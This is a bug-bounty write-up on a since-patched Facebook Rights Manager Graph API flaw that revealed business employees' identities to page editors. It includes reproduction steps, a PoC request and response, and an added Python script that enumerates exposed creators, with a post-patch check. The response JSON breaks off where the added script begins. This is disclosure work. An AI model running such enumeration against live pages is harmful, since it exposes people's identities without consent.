Thursday, 22 August 2019

Rights Manager Graph API: Disclosure of Business Employee Identity to Non-Business Page Employee

I found a bug in the Graph API behind Facebook Rights Manager that lets a non-business page employee (a page Admin or Editor) learn the identity of a business employee.



Summary:

Vulnerability Type: Identification / Privacy
Product Area: Pages
A malicious page employee who is not part of the Business Manager can learn the identity of a business employee through the Reference Files section of Rights Manager.

Description:

Facebook offers Rights Manager, a video copyright tool for content creators who publish on Facebook Pages, through which a creator can track who copies their videos and republishes them without permission. More info: "https://rightsmanager.fb.com/"

Once your request to enable the tool on your page is accepted, open your page from the business admin account, go to "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES" and add a reference video. After the reference file is added, look at the "Date Added" column: it contains the information of the account that added the file.

Now, if a page employee (Admin or Editor) who is not part of the business opens the same link "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES", they can identify the business admin just by looking at the "Date Added" column.

Impact:

Disclosure of a business employee's identity to a non-business page employee.

Explain impact:

The business employee's identity is disclosed to a non-business page admin through the Rights Manager video_media_copyrights Graph API edge. Normally, business admins are hidden from page users who are not part of the business.

Setup:

Use this link to learn how to add Rights Manager to your page: "https://rightsmanager.fb.com/"

Steps:

1. Create a page and add an Editor as a page employee.
2. Create a Business Manager account.
3. Link the page to Business Manager.
4. Use this link to learn how to add Rights Manager to your page: "https://rightsmanager.fb.com/"
5. After Rights Manager is enabled on your page, upload any video.
6. From the business admin account, go to "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES"
7. Click "Add Files" and add the video to Reference Files.
8. Now, if an Admin or Editor page employee opens "https://web.facebook.com/YourPage/publishing_tools/?section=ALL_REFERENCE_FILES", they can identify the business admin.

PoC GET request:


GET /v2.6/YourPage/video_media_copyrights?access_token=Editor_Token&fields=["creator"] HTTP/1.1
Host: graph.facebook.com

Response:

{
    "data": [
        {
            "creator": {
                "name": "Jafar Abo Nada", 
                "id": "100002271816418"
            }, 
            "monitoring_status": "COPYRIGHTED", 
            "id": "2511847998861026", 
            "reference_owner_id": "936928013019707"
        }, 
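To turn the PoC above into a repeatable check, the following script is an added example (not code from the original report or from any Facebook SDK). It assumes only what the PoC shows: the /{page-id}/video_media_copyrights edge, a "creator" object with "id" and "name", and the standard Graph API "data" plus "paging.cursors.after" envelope. It rebuilds the PoC URL, walks every page of the edge offline through an injected fetcher, reports creators that are not among the page's own role holders (the business-side identities the report says should stay hidden), and offers a post-patch check that passes only when no item carries a creator. All IDs, names, tokens and cursors below are constructed sample values, not real identifiers.

```python
"""Offline check for the Rights Manager creator disclosure described in the PoC.

Added example, not part of the original report or of any Facebook SDK.
Assumptions: edge /{page-id}/video_media_copyrights, a "creator" object with
"id" and "name", and the usual Graph API "data" + "paging" envelope.
Every ID, name, token and cursor in the sample data is constructed.
"""
from typing import Callable, Dict, Iterator, List, Optional, Set
from urllib.parse import urlencode

GRAPH_HOST = "https://graph.facebook.com"


def build_poc_url(page_id: str, access_token: str, version: str = "v2.6") -> str:
    """Rebuild the PoC GET request as a URL. The PoC sent fields as a JSON
    array (["creator"]); this uses the documented comma-separated form."""
    query = urlencode({"access_token": access_token, "fields": "creator"})
    return f"{GRAPH_HOST}/{version}/{page_id}/video_media_copyrights?{query}"


def walk_pages(first: dict, fetch_after: Callable[[str], Optional[dict]]) -> Iterator[dict]:
    """Yield each page of a paginated edge. fetch_after(cursor) returns the
    next page or None; it is injected so the walk runs offline in the test."""
    page: Optional[dict] = first
    while page is not None:
        yield page
        paging = page.get("paging", {})
        cursor = paging.get("cursors", {}).get("after")
        # The Graph API includes paging.next only while more results exist.
        page = fetch_after(cursor) if ("next" in paging and cursor) else None


def creators_in(page: dict) -> List[dict]:
    """Every creator object present in one page of the response."""
    return [item["creator"] for item in page.get("data", []) if item.get("creator")]


def disclosed_creators(first: dict, fetch_after, page_role_ids: Set[str]) -> Dict[str, str]:
    """Map id -> name for every creator the token can see who is NOT one of
    the page's own role holders, i.e. a business-side identity that a page
    Admin/Editor outside the business should not be able to learn."""
    leaked: Dict[str, str] = {}
    for page in walk_pages(first, fetch_after):
        for creator in creators_in(page):
            if creator["id"] not in page_role_ids:
                leaked[creator["id"]] = creator.get("name", "")
    return leaked


def fix_verified(first: dict, fetch_after) -> bool:
    """Post-patch check: True when no item on any page carries a creator."""
    return all(not creators_in(page) for page in walk_pages(first, fetch_after))


# --- constructed sample data (not taken from the report) --------------------
PAGE_ROLE_IDS = {"200000000000001", "200000000000002"}  # page Admin and Editor
SAMPLE_PAGES = {
    "first": {
        "data": [
            {"creator": {"name": "Business Admin (sample)", "id": "100000000000001"},
             "monitoring_status": "COPYRIGHTED", "id": "300000000000001",
             "reference_owner_id": "400000000000001"},
            {"creator": {"name": "Page Editor (sample)", "id": "200000000000002"},
             "monitoring_status": "COPYRIGHTED", "id": "300000000000002",
             "reference_owner_id": "400000000000001"},
        ],
        "paging": {"cursors": {"after": "cursor-2"},
                   "next": "https://graph.facebook.com/v2.6/YourPage/video_media_copyrights?after=cursor-2"},
    },
    "cursor-2": {
        "data": [
            {"creator": {"name": "Business Admin (sample)", "id": "100000000000001"},
             "monitoring_status": "COPYRIGHTED", "id": "300000000000003",
             "reference_owner_id": "400000000000001"},
        ],
        "paging": {"cursors": {"after": "cursor-3"}},  # no "next": last page
    },
}
# What the same edge should look like once the creator field is no longer exposed.
PATCHED_PAGE = {
    "data": [{"monitoring_status": "COPYRIGHTED", "id": "300000000000001",
              "reference_owner_id": "400000000000001"}],
    "paging": {"cursors": {"after": "cursor-x"}},
}


def fetch_sample(cursor: str) -> Optional[dict]:
    """Offline stand-in for an HTTP GET of the next page."""
    return SAMPLE_PAGES.get(cursor)


if __name__ == "__main__":
    print(build_poc_url("YourPage", "Editor_Token"))
    print(disclosed_creators(SAMPLE_PAGES["first"], fetch_sample, PAGE_ROLE_IDS))
    print("patched:", fix_verified(PATCHED_PAGE, fetch_sample))
```

Against a live page you would replace fetch_sample with a function that performs the GET for the given cursor with the Editor token, and fill PAGE_ROLE_IDS from the page's own role list; the comparison then reports only creators who are invisible to the page team, which is exactly the identity leak the report describes.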




Follow me on Twitter: @jafar_abu_nada, Facebook: Jafar Abo Nada


Timeline:

Jul-8-2019: Report sent

Jul-12-2019: Facebook reproduced the report

Jul-15-2019: Confirmation of submission by Facebook

Aug-5-2019: Confirmation of patch by Facebook

Aug-22-2019: Bounty awarded by Facebook

